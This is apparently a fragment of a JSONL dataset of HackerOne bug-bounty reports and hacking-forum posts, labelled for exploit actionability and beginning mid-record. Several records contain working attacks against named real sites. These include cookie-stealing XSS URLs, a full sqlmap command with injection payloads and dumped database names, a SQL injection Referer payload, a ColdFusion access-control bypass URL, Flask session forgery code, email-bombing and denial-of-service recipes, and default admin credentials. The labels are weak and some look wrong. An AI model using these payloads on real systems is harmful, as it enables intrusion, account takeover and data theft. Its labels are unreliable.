_gat_gtag_UA_133171872_1=1; ph_JRMZGA_RF-346IQfReUvbuoVD3Q94BM7Jij8Nk4dQbA_posthog=%7B%22distinct_id%22%3A%226125176260945b0022963f91%22%2C%22%24device_id%22%3A%2217b8224bdc1b90-0dfb1b4a415c87-53e3566-1fa400-17b8224bdc2dd5%22%2C%22%24initial_referrer%22%3A%22%24direct%22%2C%22%24initial_referring_domain%22%3A%22%24direct%22%2C%22%24referrer%22%3A%22%24direct%22%2C%22%24referring_domain%22%3A%22%24direct%22%2C%22%24session_recording_enabled%22%3Atrue%2C%22%24active_feature_flags%22%3A%5B%5D%2C%22%24sesid%22%3A%5B1629976379518%2C%2217b8224c6b14ef-0de7d34a9af7ee-53e3566-1fa400-17b8224c6b2ea5%22%5D%2C%22%24user_id%22%3A%226125176260945b0022963f91%22%7D\n\n{\"email\":\"testgokulab@gmail.com\"}\nStep 3- Now Send This Request To Intruder And Repeat It 100 Time By Fixing 150 Null payloads.\n\nStep 4 - See You Will Get 200 ok Status Code & many Email In Your INBOX\nSee It Is Resulting In Mass Mailing Or Email Bombing To Your Users Which Is Bad For Business Impact.\n\n\n## Recommendations for Fixing/Mitigation\n\nI Will Recommend You To Add A ReCaptcha & Sort Of Something Which Requires Manual Human Interaction To Proceed Like You Can Add Captcha Like 2+2=_ so that it cannot be brute forced and you also can have a limit at the backend for particular number upto 5 times a day user can request Forget Password Email or Link something like that will prevent you from someone exploiting this vulnerability\n\n## Impact\n\nImpact\nIf You Are Using Any Email Service Software API Or Some Tool Which Costs You For Your Email This Type Of Attack Can Result You In Financial Lose And It Can Also Slow Down Your Services It Can Take Bulk Of Storage In Sent Mail Although If Users Are Affected By This Vulnerability They Can Stop Using Your Services Which Can Lead To Business Risk", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d1e9d12e6d6f1d975849", "text": "[Cross-site Scripting (XSS) - Stored] Cache Poisoning Allows Stored XSS Via hav Cookie Parameter (To Account Takeover)\n\n## Summary:\n\nReport #1698316 was closed as resolved \n\nYou told me that the stored XSS was going to be resolved since \"As this relies on the same root cause, we will be closing it as duplicate\", but no \n\n\nabritel.fr has a strong WAF, however the server hides double quotes, allowing to bypass the WAF\n\ne.g\n\nThe server blocks ``\n\nWAF is bypassed and the output is \n\n\n## Steps To Reproduce:\n\n\n1-> Send this request \n\n```http\nGET /annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.js?xxxd HTTP/2\nHost: www.abritel.fr\nCookie: hav=xss\"\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://www.abritel.fr/signup?enable_registration=true&redirectTo=%2Fsearch%2Fkeywords%3Asoissons-france-%28xss%29%2FminNightlyPrice%2F0%3FpetIncluded%3Dfalse%26filterByTotalPrice%3Dtrue%26ssr%3Dtrue&referrer_page_location=serp\nUpgrade-Insecure-Requests: 1\nTe: trailers\n```\n\n2-> Using another browser visit: \n\nhttps://www.abritel.fr/annonces/location-vacances/france_midi-pyrenees_46_stcere_dt0.php.jpeg?xxxd\n\nExploit:\n\nThis is the payload to extract the HASESSIONV3 \nxss\"\n\n\n## Supporting Material/References:\n\n{F2016192}\n\n## Impact\n\nStored XSS to Account Takeover", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "3f9ce30d1b3f1f5b39eb", "text": "[Uncontrolled Resource Consumption] DoS via Playbook\n\n## Summary:\nA normal user can create a playbook, that has some attributes like the `run_summary_template`, `retrospective_template` and `description`,that don't have any size check or validation, which allows an attacker to set an unlimited number of characters as their values.\n\nIn a production environment is possible to set up to 50MB of data, due to the default nginx configuration, as the `run_summary_template` value. The creation of the playbook for itself is not sufficient to trigger an DoS attack in the application, but once this playbook is executed(run) the server starts to consume a large amount of computing resources, which causes to the server to stop responding to users requests and ultimately leads to server crash.\n\nThis attack is even worst because after the application is restarted, its not possible to the user who created the playbook run to finish its execution via the Web Portal, because both the channel created by the playbook run, and the run dedicated management page, don't properly load, showing only a blank screen.\n\n## Steps To Reproduce:\n1. Log in as a normal user in the platform.\n2. Grab the user `MMAUTHTOKEN` authentication token.\n3. Generate the playbook payload, that contains 50000000(50MB) characters as the `run_summary_template` attribute value. Use F1893243\n4. Send the following `POST` request to the `plugins/playbooks/api/v0/playbooks` API endpoint:\n```bash\ncurl -X POST \"http:///plugins/playbooks/api/v0/playbooks\" -H 'Content-Type: application/json' -d @payload --cookie \"MMAUTHTOKEN=\" -H \"X-CSRF-TOKEN: \"\n```\n5. Go to the playbooks page, and click on the newly created playbook.\n6. Click in the \"Run\" button and then set an name for the run.\n7. After the run is initiated, the server will start to consume an abnormal quantity of computing resources, and crashes after some seconds.\n8. The application becomes unavailable for all its users.\n\n## Supporting Material/References:\n\n * PoC Video\n{F1893242}\n\n## Impact\n\nA user can cause a full denial of service attack in the application server, making the application server unavailable to all its users.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-23", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "184fd576c73de4ac67ef", "text": "[Cross-site Scripting (XSS) - Reflected] Shop - Reflected XSS With Clickjacking Leads to Steal User's Cookie In Two Domain\n\nHii  Security Team ,\n\nI am S Rahul MCEH(Metaxone Certified Ethical Hacker) and a Security Researcher I just checked your website and found Reflected XSS to Good XSS Clickjacking In Two Domain\n\nDescription:- As the search parameter is vulnerable to XSS and but the plus point is there is  no X-Frame-Header or Click-jacking Protection.So by combing this two methods the Attack Easier And Converted it to Well Working XSS on Other User’s . \n\nVulnerable Urls:- https://marthastewart.com/shop/all.html?s=\n                            https://bhg.com/shop/all.html?s=\n\t\t\nSteps to reproduce :-\n1. Navigate to  Vulnerable URLS and As we know that ?s= parameter is vulnerable to XSS \n\n2.As Reflected XSS Occurs on :-\n\tExample1 :-  https://bhg.com/shop/all.html?s=%E2%80%98);%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\n\tExample2 :-  https://marthastewart.com/shop/all.html?s=%E2%80%98);%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E\n\n3.The attacker can use different Payloads like document.domain etc \n\n4.Now as we know there is no X-Frame-Header or Click-jacking Protection that can leads to successful attack\n\n5.Now we will create POC.html to send the victim and steal the cookies of the other users { POC.html is attached below }\n\n6.Now as the victim opens the POC.html the attacker will get the cookies of the users or victim\n\nRefernces:-\nhttps://arbazhussain.medium.com/self-xss-to-good-xss-clickjacking-6db43b44777e\nhttps://hackerone.com/reports/470206\nhttps://hackerone.com/reports/892289\n\n## Impact\n\nImpact\nBy exploiting this Vulnerability\n1.An attacker can force the customer to execute XSS and Steal user's cookie.\n2.Launch advanced phishing attacks by rendering arbitrary HTML forms.\n3.Force users to download malware/viruses.\n4.Execute browser-based attacks etc.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "37ba04718b559ebae9df", "text": "[SQL Injection] SQL injection at [https://█████████] [HtUS]\n\nHello,\n\n##Summary\n\nwhile doing test on [`www.███`](http://www.██████/) I’ve found that the endpoint at [`/olc/███comments/comment_post.php`](https://████████) is vulnerable with SQL injection vulnerability\n\n##Vulnerable parameters \n\n- staff_student\n\n##POC\n\n- using sqlmap run command\n\n```jsx\npython3 sqlmap.py --level=5 --risk=3 --tamper=space2comment --random-agent -u \"https://███████\" --data=\"staff_student=STUDENT&scn=xxx&check25=0&check20=0&check20=1&check26=0&check27=0&check29=0&check24=0&comments=xx&Submit=Submit+Comments\" -p staff_student --dbms=mysql \n```\n\n- we can see that the target parameter is vulnerable\n\n```jsx\nPOST parameter 'staff_student' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n\nsqlmap identified the following injection point(s) with a total of 103 HTTP(s) requests:\n---\nParameter: staff_student (POST)\n Type: boolean-based blind\n Title: AND boolean-based blind - WHERE or HAVING clause\n Payload: staff_student=STUDENT'||(SELECT 0x6545736f FROM DUAL WHERE 6919=6919 AND 4128=4128)||'&scn=xxx&check25=0&check20=0&check20=1&check26=0&check27=0&check29=0&check24=0&comments=xx&Submit=Submit Comments\n\n Type: time-based blind\n Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)\n Payload: staff_student=STUDENT'||(SELECT 0x615a636e FROM DUAL WHERE 7192=7192 AND (SELECT 4865 FROM (SELECT(SLEEP(5)))VDbe))||'&scn=xxx&check25=0&check20=0&check20=1&check26=0&check27=0&check29=0&check24=0&comments=xx&Submit=Submit Comments\n```\n\n{F1810520}\n- add `--dbs` we can see the sqlmap will start get the DBS\n\n```jsx\navailable databases [13]:\n[] █████████\n[] ██████mobile\n[] GET\n[] information_schema\n[] LEAM\n[] leat\n[] LEV\n[] mysql\n[] performance_schema\n[] SET\n[] test\n[] testadmin\n[*] testusers\n```\n\n\n{F1810521}\n\n## Impact\n\nattacker is able to get the database", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9afcc5b08c0e088a0d4c", "text": "[OS Command Injection] DNS rebinding in --inspect via invalid octal IP address\n\n## Summary\nThe Node.js rebinding protector for --inspect still allows invalid IP address, specifically, the octal format.\nAn example of an octal IP address is 1.09.0.0, the 09 octet is invalid because 9 is not a number in the base 8 number system.\nBrowsers such as Firefox (tested on latest version m105) will still attempt to resolve this invalid octal address via DNS. When combined with an active --inspect session, such as when using VSCode, an attacker can perform DNS rebinding and execute arbitrary code\n\n## Steps To Reproduce:\n1. Add entry to /etc/hosts\n```````\n127.0.0.1 1.09.0.0\n```````\n2. Start `node --inspect`\n3. Visit http://1.09.0.0:9229/json on Firefox (tested on m105) \n4. JSON file shows. This proves Firefox is resolving 1.09.0.0 to 127.0.0.1 via DNS. Additionally, you may use Wireshark to see that Firefox is sending DNS requests to 1.09.0.0 (without the /etc/hosts entry of course!)\n\n## Impact\n\nBypass the DNS rebinding protection for --inspect and execute arbitrary code", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2b6f55b3d5cc573ff1be", "text": "Does someone else have a 504 Gateway Timeout on PHP file? I lost my reverse shell after a Ctrl+C but couldn’t resend my payload because every PHP page send a 504. Root HTML works fine though. I’m on EU Fortress 1", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-10-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "18e1fc6ca956cfef95c7", "text": "You are on the right track with the User agent. Play around with your inputs. Maybe make them simple at first just to make sure you can actually run code. There is a risk that you can enter in a user agent which breaks the admin page when it tries to read the access log, this means that any agent text entered after the one that broke the page will have no effect because the page breaks before it can read any new agents. You will need to restart the assessment machine if that happens.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-11-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "21f445146e0a068f549a", "text": "[Improper Access Control - Generic] Default Login Credentials on https://broadbandmaps.mtn.com.gh/\n\n## Summary:\nHello Team,\nI just found out that `broadbandmaps.mtn.com.gh` requires logging in when you visit it, but it turned out that you can actually login as an Admin and do anything on the specific site.\nwhen you visit the mentioned site you will get this \n{F1405776}\nit will require to be logged in to perform any action, to bypass this you have to Login with the default credentials `Username`= admin `password`= admin , and for some reasons you can't login with Firefox it only works on Google chrome and chromium web browser.\n\n## Supporting Material:\n-Check this Video >\n{F1405806}\n\n## Impact\n\nAccess admin Panel due to Default credentials", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-08-25", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9230786e7beddee067d6", "text": "Hello friend! Taking notes for OSCP and HTB can be a game-changer, right? You should definitely check out https://notesonline.com – they’ve got some awesome tips and templates for effective note-taking. Personally, I’ve found that breaking down challenges step by step and using screenshots helps a ton.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0e1599f1edcff84cb02f", "text": "[Uncontrolled Resource Consumption] Specific Payload makes a Users Posts unavailable\n\nGood Morning, \n\nLike we talked about in the email, I'm reporting an issue that I've found that is possible, by crafting a specific payload, other users that try to access **/posts** of a user will face the **500 Internal Server Error** issue, not only when they access the specific crafted post. With this, the posts of the user will be blocked for other users. This could cause other problems like people possibly doing this on other's accounts and blocking all their posts for other users or it could be chained with some other vulnerability in the future.\n\nI found this issue when I was fuzzing with the markdown as I saw you guys were using **Links**, so trying some HTML encodings led me to the following payload: `[PoC](￾())`.\n - `￾` decoded will endup a [invalid character](https://charbase.com/fffe-unicode-invalid-character)\n - `)` decoded will endup a `)`. \n\nWith this, we can see that the markdown doesn't take our encoding very well which then causes a 500 Internal Server Error and blocks the **Posts** of any user to other users.\n\nProof that the **Fetlife Security Team** gave me the **go-ahead** to report this issue. \n\n{F1280132}\n\nSteps to Reproduce\n=====================\n\n1. Go to **Write Post**\n2. On the **Body** insert the following payload `[PoC](￾())`\n\n{F1280189}\n\n3. Click on **Express Yourself**\n4. We are now faced with the **500 Internal Server Error** and if we try to access https://fetlife.com/users/OUR_USER_ID/posts, we can see that our posts are completely blocked for us and everyone and that we're still faced with a **500 Internal Server Error**.\n\nFinal\n=====================\nThank you for your time, best regards, Rafael Castilho\n\n## Impact\n\nThis could cause other problems like people possibly doing this on other's accounts and blocking all their posts for other users or it could be chained with some other vulnerability in the future.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ba02061469c6602c5f1e", "text": "[Insecure Direct Object Reference (IDOR)] IDOR in TalentMAP API can be abused to enumerate personal information of all the users\n\n## Summary:\n\nI hope you're having a good day. Before starting to describe this vulnerability, I would like to thank the HackerOne triage team for doing the difficult job of triaging all these issues. \n\nI observed an IDOR vulnerability in one of the endpoints in the Talentmap API. This vulnerability is similar to #1809328. In this report I will demonstrate ways to enumerate all user accounts in the Talentmap API logged in as a guest user. To triage this vulnerability, you need to manually build it in your system, the build instructions can be accessed in the report #1809328 where HackerOne team has successfully built the Talentmap API. However, if you're having issues building it, drop a message!\n\nAfter building the API, please go inside the docker container and run the following commands to create_seeded_users.\n\n1. `$ python manage.py create_demo_environment` \n2. `$ python manage.py create_seeded_users`\n\nAlso, go into the docker container and create some test users:\n1. `$ python manage.py create_user normalUser normaluser@gmail.com normalUser123 Normal User`\n2. `$ python manage.py create_user normalUser1 normaluser1@gmail.com normalUser123 Normal User`\n3. `$ python manage.py create_user normalUser2 normaluser2@gmail.com normalUser123 Normal User`\n\n** Some details: **\ni. The vulnerable endpoint = http://localhost:8000/api/v1/permission/user/{USER_ID}/ \n\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. After running the API, browse `http://localhost:8000` and login using the credentials `username: guest , password: guestpassword ` , and copy the token obtained in the respones\n\n{F2139636}\n\n{F2139638}\n\n 2. Send the following request to http://localhost:8000. Replace {USER_ID} to the user id of the user you want to enumerate information of. Replace {token} to the token you obtained in step 1\n\n```\nGET /api/v1/permission/user/{USER_ID}/ HTTP/1.1\n\nHost: localhost:8000\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: http://localhost:8000/\nJWT: {token}\nConnection: close\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\n```\n\n 3. Observe user information returned in the response\n\nAdditionally, you could also use Burp intruder to cycle through user-ids from 1 to 100 to get information of all users in the database.\n\n{F2139641}\n\n##Remediation Guidance\n\nImplement access control mechanism. Allow the user to only fetch their information.\n\n## Supporting Material/References:\n[list any additional material (e.g. screenshots, logs, etc.)]\n\n * [attachment / reference]\n\n## Impact\n\nA malicious actor could fetch information of all users and cause a data breach", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-04-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bc6f661fb87ec20a76d9", "text": "[Insufficient Session Expiration] Broken Authentication Session Token Bug\n\nHi Team \nHope your are good I have found a broken authentication issue in https://www.trycourier.app\n\nSteps to reproduce \n\n1. Create a courier account or use existing one.\n2. Confirm Your email address.\n3. Now log out from your account and request for password reset code for your account .\n4. Don't use the code that has been sent to your email address.\n5. In new tab or new browser log in back to your account.\n6. Go to account setting and change your password .\n7. Now go to email and check the password reset code that we requested in step 3.\n8. Change Your password using that reset password code .\n9. You can see that your password has been changed.\n\nThe reset code is not expired after changing the password\n\n## Impact\n\nIf the site has a token issue, The result is the reset password token in the Step 3 is still usable and did not expire yet. \nIf the victims opens his mail in cybercafe or in attackers device and forgot to log out then attacker can access that system and can reset the password of his account.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "245d8a7a1c2e7576051d", "text": "Maybe TimeVerter can help you: GitHub - D3vil0p3r/timeverter: Bruteforce time-based tokens and convert several time domains.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-05-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "80e77931c14ecb37d93e", "text": "[Unknown] [C#] CWE-759: Query to detect password hash without a salt\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7a4cb533e5c08fb6ff10", "text": "If you know there is a stranger IPhone on your network, you can just install NetCut on Windows OS, which has a Free version forever and ARP Poison and Jail the IPhone on your network. Also you could Log into your Router and Black-List that IPhones IP or Mac Address and Keep an eye out on what happens and How many devices are connected to the Network. Computers/Phones/Tablets/IOT/Cast-Devices/Wifi-Extenders.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackersploit", "forum_id": "hackersploit", "timestamp": "2022-10-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b7b91683c19a923588c6", "text": "[Insecure Direct Object Reference (IDOR)] Reddit talk promotion offers don't expire, allowing users to accept them after being demoted\n\n## Description: \n\nWhen promoting a user to a speaker/host, an offerId is created which can be accepted by the user. However, after accepting them the offerIds don't expire. This means that after the user is demoted back to a listener, they can still use the offerIds to go back to their previous promoted role.\n\n## Steps To Reproduce:\n\n1. Have 2 accounts ready UserAVictim and UserBAttacker.\n2. Create a new reddit talk as UserAVictim.\n3. As UserB join the talk.\n4. As UserA promote UserB to the speaker (works as well with host). This can be done by clicking their avatar and choosing invite to speak (to promote to speaker) or add as host (to promote to host).\n5. As UserB notice that a pop up appears saying \"USER has invited you to speak\". Monitor and save the request used when clicking accept.\nThe request should be to https://gql.reddit.com \nThe body should be similar to \n{\"variables\":{\"platformUserId\":\"PLATFORM_USER_ID\",\"offerId\":\"UUID_OFFER_ID\"},\"id\":\"475c91dd4480\"}\n6. As UserA demote UserB to listener. (Click UserB's avatar and click Move to Audience)\n7. As UserB repeat/re-send the request used in step 5. Notice that you will be promoted back to speaker/host.\nThis works even after you are demoted again.\n\n## Impact\n\nThis allows speakers/hosts of a talk to re-become a speaker/host at any time after being demoted. This could lead to interruptions to the reddit talk.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e66ff53a2f5a72664259", "text": "[Code Injection] CVE-2023-5528: Insufficient input sanitization in in-tree storage plugin leads to privilege escalation on Windows nodes\n\nThis is an imported report from the email i have sent a month ago about a code injection vulnerability\nThe vulnerability was assigned as CVE-2023-5528\nAs a reference i have talked with Balaji from the k8 team.\nExcerpts from the email chain that might be relevant:\n\n\"Just a quick update to let you know that we were able to reproduce the issue and are working on a fix. CVE-2023-5528 has been reserved for this issue. We'll keep you updated on the next steps as we review the proposed fix.\"\n\n\"Hi Tomer,\nThis is being rated as a Tier 1 High severity ($5,000) bounty.\"\n\nThe vulnerability was verified and assigned a CVE by the k8 team\n\n## Impact\n\nCode execution from kubelet context(SYSYTEM privileges) on all windows nodes on a cluster.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-5528"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "915743a5c15d40d84f91", "text": "[Unknown] How the Arch Angel stole Live Events\n\n**Summary:**\n\nI figured I'm well overdue for this. \n\nLooking forward to the 2024 LHE season!\n\nI <3 you Hackerone, & Community Team!\n\n**Description:**\n\n\n\n```\n\nEvery hacker on Hackerone liked Live Hacking a lot… \nBut ArchAngel who’d been to fifteen did NOT! \nThe Angel hated hacking! The whole live event season! \nNow, please don’t ask why. No one quite knows the reason.\n\nIt could be perhaps there’s a WAF he can’t thwart, \nIt could be perhaps the dupe window was too short, \nBut I think that the most likely reason of all, \nMay have been that the snack options were two sizes too small.\n\nWhatever the reason, dupe window or the snackers, \nHe dreaded an invite while HATING the hackers, \nStaring at his monitor with a sour, bearded frown, \nAt all the hackers having fun in the live-event town.\n\nFor he knew every hacker at the LHE venue, \nWas busy ordering drinks from the happy hour menu, \n“And they’re collabing on bugs!” He snarled with a sneer, \n“Tomorrow is the event day, it’s practically here!”\n\nThen he growled, with his angelic fingers nervously drumming, \n“I MUST find some way to stop bounties from coming!” \nFor Tomorrow, he knew, all the Customer girls and boys, \nWould wake bright and early. They'd ready their employees!\n\nAnd then! Oh, the exploits! Oh, the exploits! \nExploits! Exploits! Exploits! \nThat's one thing he hated! The EXPLOITS! \nEXPLOITS! EXPLOITS! EXPLOITS!\n\nThen the hackers young and old would sit and hunt bugs. \nThey’d find bugs, and find bugs, and find BUGS BUGS BUGS BUGS! \nThey’d find bugs for the customer, who’d give them some hugs, \nWhich is something that made the arch angel say “ugh!”\n\nAnd THEN they’d do something he liked least of all! \nEvery hacker at the live event, the tall and the small, \nWould slam on the keyboard with their fingers jabbing, \nThey’d hack side by side, and the hackers would start collabing!\n\nThey’d collab! And they’d collar! And they’d COLLAB COLLAB COLLAB! \nAnd the more the Arch Angel thought of this Live Event Collab, \nThe more the Arch Angel thought, “their bugs I must grab!” \nWhy, for thirty-four years I’ve put up with it now!\n\n“I MUST stop the Live Event from starting! But HOW?” \nThen he got an idea! An awful idea! \nThe Arch Angel got a wonderful AWFUL idea! \n“I know just what to do!” The Angel said with fervent,\n\nAs he put on his best Argentine accent \nAnd he chuckled, “This is the ruse of the century!” \n“Why with an accent and some stilts, I’ll look just like Ari!” \n“All I need is some hair…” The Angel looked around.\n\nBut since The Angel was bald, there was none to be found. \nDid that stop the Arch Angel? No! The Angel simply said, \n“If I can’t grow my own hair, I’ll steal some good hair instead!” \nSo he called up Nicole, and took out his shears,\n\nAnd glued on her locks, right above his ears. \nThen he loaded some bags and some old empty sacks, \nOnto a plane to go steal some uber leet hax. \nThe Arch Angel was giddy, as his plane landed down,\n\nAnd slunk from the airport in the live event town. \nThe venue was dark. He’d have so much success! \nAll the hackers were still barhopping and partying with Jess! \nWhen he came to first room of swag he’d finesse.\n\n“This is stop number one,” the old Ari-fake hissed, \nAnd he walked in the door, empty bags in his fist. \nHe tried to log into Twitch, a task very painful, \nBut if Ariel could do it, then so could the Angel.\n\nHe got stuck only once, for a moment or two. \nThen he restarted his laptop, his monitor blue. \nAnd announced to the Twitch audience who was there for a show, \n“These swag boxes,” he grinned, “are the first things to go!”\n\nThen he slithered and slunk, with a smile most unpleasant, \nAround the whole room, and took every swag present! \nT-shirts! Waterbottles! Stickers! Hoodies! \nCustom Snowboards, and other long-awaited goodies!\n\nAnd he stuffed them in bags. Then the Arch Angel of gloom, \nSet his eyes next on the triaging room. \nHe slunk into that room. He watched the scope call! \nHe peaked at the triage queue. His jaw started to f", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-12-15", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2683e8f910ea3944e1f2", "text": "[Improper Authentication - Generic] Critical full compromise of jarvis-new.urbanclap.com via weak session signing\n\n## Summary\nHi there, I discovered that jarvis-new.urbanclap.com uses a weak Flask session key. Because Flask sessions are signed with a static secret, if this secret is known to an attacker then they can modify the session state. In this case, we can modify the Redash `user_id` for the session and log in as any user. **This results in a full compromise of the instance.** I have attached a screenshot showing that I logged into `█████████@urbancompany.com` and have full admin permissions:\n\n██████████\n████\n██████████\n███████\n\n## How to fix\nChange the `REDASH_COOKIE_SECRET` and `REDASH_SECRET_KEY` to a random value immediately.\n\n## PoC\nFor simplicity, it is easiest to forge a password reset link for Redash. We can do this with a bit of Python. To get the reset link for user ID 1, we simply run:\n```\n>>> from itsdangerous import URLSafeTimedSerializer, SignatureExpired, BadSignature\n>>> serializer = URLSafeTimedSerializer(\"███\")\n>>> serializer.dumps(str(\"1\"))\n'███'\n```\n\nThen, we can browse to `https://jarvis-new.urbanclap.com/reset/█████` and choose a new password for user ID 1. This then logs us into their account.\n\n## Impact\n\nSince this is connected to all of your databases, this is likely a significant leak of PII and other sensitive information. This is easily a critical issue.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "01fa5fdfc5dccffe8a10", "text": "[Cleartext Storage of Sensitive Information] internal dev tokens disclosure\n\nsnapchat has made Keydb as opensource but its development repo on github is leaking too much internal sensitive data in commits history which should not be a good idea to be revealed in open source project.\nsuch as https://github.com/Snapchat/KeyDB/commit/157b32109854f947843366f66215ccf90809e766\n```\n[Dockerfile](https://github.sc-corp.net/Snapchat/keydb-internal/github-action-runner-docker/Dockerfile). \n3. Take the token from that script. Should be in \"Configure\" section: \n ``` \n ./config.sh --url https://github.com/EQ-Alpha/KeyDB --token ████\n```\n██████\n\n## Impact\n\ninternal dev sensitive information disclosed publicaly\nfor example PAT token i pasted above", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c805f24dbe6313d55fe9", "text": "thank you to everyone who contributed in providing tips you all were very helpful. my piece of advice would try and get an error in your burp requests that gives you an idea of what commands are being ran in what syntax while messing around with the different feilds of injection. once youve got the syntax then all you need to do is bypass filters and find the proper payload.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0c4656265c993c32f3cd", "text": "[Improper Access Control - Generic] Adobe ColdFusion - Access Control Bypass [CVE-2023-38205] at ██████\n\nHello Gents, I would like to report an issue where attackers are able to bypass the product feature that restricts external access to the ColdFusion Administrator. [CVE-2023-38205] at `██████`\n\n\n\n## Steps to reproduce\n+ Please open the following link:\n\n> https://█████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n\n## Proof of concept\n\n+ ████\n\n## Impact\n\nAccess Control Bypass.\n\nThanks and have a nice day!\n\n## System Host(s)\n██████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n+ Please open the following link:\n\n> https://████████/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-38205"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ecdba9fde434fb159e6a", "text": "[SQL Injection] SQL INJECTION in https://████/██████████\n\nBug is : Sql injection in https://██████████/████████ via Referer\nI've confirmed the vulnerability using sleep SQL queries with various arithmetic operations. The sleep command combined with the arithmetic operations will cause the server to sleep for various amounts of time depending on the result of the arithmetic operation.\n\n##Proof of concept :\n1- go to https://██████████/████████ and capture Request \n2- put this payload in Referer '+(select*from(select(sleep(6*6)))a\n\n## Impact\n\n##Impact :\nAn attacker can manipulate the SQL statements that are sent to the MySQL database and inject malicious SQL statements. The 